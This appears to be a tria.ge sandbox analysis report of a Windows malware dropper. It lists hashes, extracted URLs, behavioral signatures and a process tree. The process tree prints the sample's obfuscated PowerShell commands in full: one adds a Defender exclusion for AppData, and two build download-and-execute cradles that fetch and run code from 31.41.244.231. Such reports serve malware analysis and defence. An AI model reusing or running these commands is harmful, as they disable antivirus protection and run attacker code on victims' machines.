Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12/09/2022, 19:56
Behavioral task
behavioral1
Sample
3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
out.exe
Resource
win7-20220812-en
Behavioral task
behavioral4
Sample
out.exe
Resource
win10v2004-20220812-en
General
-
Target
3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
-
Size
979KB
-
MD5
c13f1a8cf97ee2f8c3c782e7e8bb717f
-
SHA1
02c0218bca2ce9801860b1b0793d8631d09b9933
-
SHA256
3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea
-
SHA512
79073289d8e9b902cbbb895164b7c1e06f18a8367d339b3f3d681170306882de436bcdb9eb3b73c69d4869e40f98138ad8b0d89e1709d2158dfef028b92b4f08
-
SSDEEP
24576:gYrxUgRM5Ybc9bKvu6DPiCskNxZsTB3O6vJV9XKEYoSNd64X:g1Cgb+DPitklsTB3vJLXY5Nd6q
Malware Config
Extracted
http://31.41.244.231/AVAVA/WAW/APPDATA/go.oo
Extracted
http://31.41.244.231/AVAVA/WAW/Documents/go.oo
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 28 3916 powershell.exe 29 1988 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3116 Offer.exe -
resource yara_rule behavioral2/memory/1368-132-0x0000000000400000-0x0000000000434000-memory.dmp upx behavioral2/memory/1368-133-0x0000000000400000-0x0000000000434000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Offer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3916 powershell.exe 1988 powershell.exe 3836 powershell.exe 3916 powershell.exe 1988 powershell.exe 3836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3836 powershell.exe Token: SeDebugPrivilege 3916 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3116 Offer.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1368 wrote to memory of 3060 1368 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe 87 PID 1368 wrote to memory of 3060 1368 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe 87 PID 1368 wrote to memory of 3116 1368 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe 89 PID 1368 wrote to memory of 3116 1368 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe 89 PID 1368 wrote to memory of 3116 1368 3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe 89 PID 3116 wrote to memory of 3836 3116 Offer.exe 90 PID 3116 wrote to memory of 3836 3116 Offer.exe 90 PID 3116 wrote to memory of 3836 3116 Offer.exe 90 PID 3116 wrote to memory of 1988 3116 Offer.exe 92 PID 3116 wrote to memory of 1988 3116 Offer.exe 92 PID 3116 wrote to memory of 1988 3116 Offer.exe 92 PID 3116 wrote to memory of 3916 3116 Offer.exe 94 PID 3116 wrote to memory of 3916 3116 Offer.exe 94 PID 3116 wrote to memory of 3916 3116 Offer.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe"C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\Offs\KillDuplicate.cmd" "C:\Users\Admin\AppData\Roaming\Offs" "3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe""2⤵PID:3060
-
-
C:\Users\Admin\AppData\Roaming\Offs\Offer.exe"C:\Users\Admin\AppData\Roaming\Offs\Offer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAJwAgACAALQBGAG8AcgBjAGUAOwA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/APPDATA/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/Documents/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD521b2515b8ce8a500003c74edc982a17b
SHA117edc69d4cf122da08d0dd7582626ae2379d4c60
SHA256df4a9df4b79a2f364b99f24f682e0b9cd96ed7c93a56805bfd0dfd5d1330f66f
SHA51297b9c3766126f2c5ac28554b880ffdeddc9eebfff903101c25ca58bcbce0b0e17a7e5fc15804ef2064a67b5dd009c3b339bd9bf9f9b56f591876d920a5d4320c
-
Filesize
18KB
MD50b9b16e9ebb1c0f5a966ce4840d8a694
SHA1ed21e94ad30fc5177d1c34a7411ef3d43b1096a9
SHA2566ada979d402c17a05fe93c3c17c2a5e692214fa2bb6a7938db35d47b062946cb
SHA512ef6ad9aa5820c216879818461719da49d8f49b581a83b83b61def1a320ee219e3d760fc1390dc93e1492cf98ddf9cc7a449b766855e0f64c19b2e8fd3031b7dc
-
Filesize
7KB
MD5fa4300da126da4a4ecf2c0d82dbe92f4
SHA13acbae61f796e7fad05ee9a875a9d3cbd6ec3996
SHA2561ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5
SHA512d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9
-
Filesize
7KB
MD5fa4300da126da4a4ecf2c0d82dbe92f4
SHA13acbae61f796e7fad05ee9a875a9d3cbd6ec3996
SHA2561ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5
SHA512d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9